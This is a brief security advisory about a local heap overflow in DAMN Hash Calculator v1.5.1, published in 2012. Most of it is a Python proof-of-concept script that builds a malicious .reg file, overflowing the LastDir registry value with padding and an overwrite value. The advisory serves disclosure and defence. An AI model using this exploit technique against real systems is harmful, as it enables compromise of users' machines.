|
|
| |
| DAMN Hash Calculator v1.5.1 Local suffers from heap overflow vulnerability |
| |
Credit:
The information has been provided by Julien Ahrens.
|
| |
Vulnerable Systems:
* DAMN Hash Calculator v1.5.1
file="poc.reg"
junk1="\x41" * 392
boom="\x45\x42\x42\x42"
junk2="\x43" * 50
poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\DAMN\Hash Calculator\Settings]\n"
poc=poc + "\"LastDir\"=\"" + junk1 + boom + junk2 + "\""
try:
print "[*] Creating exploit file...\n";
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!";
except:
print "[!] Error while creating file!";
Disclosure Timeline:
Published: 2012-02-22
|
|
blog comments powered by
|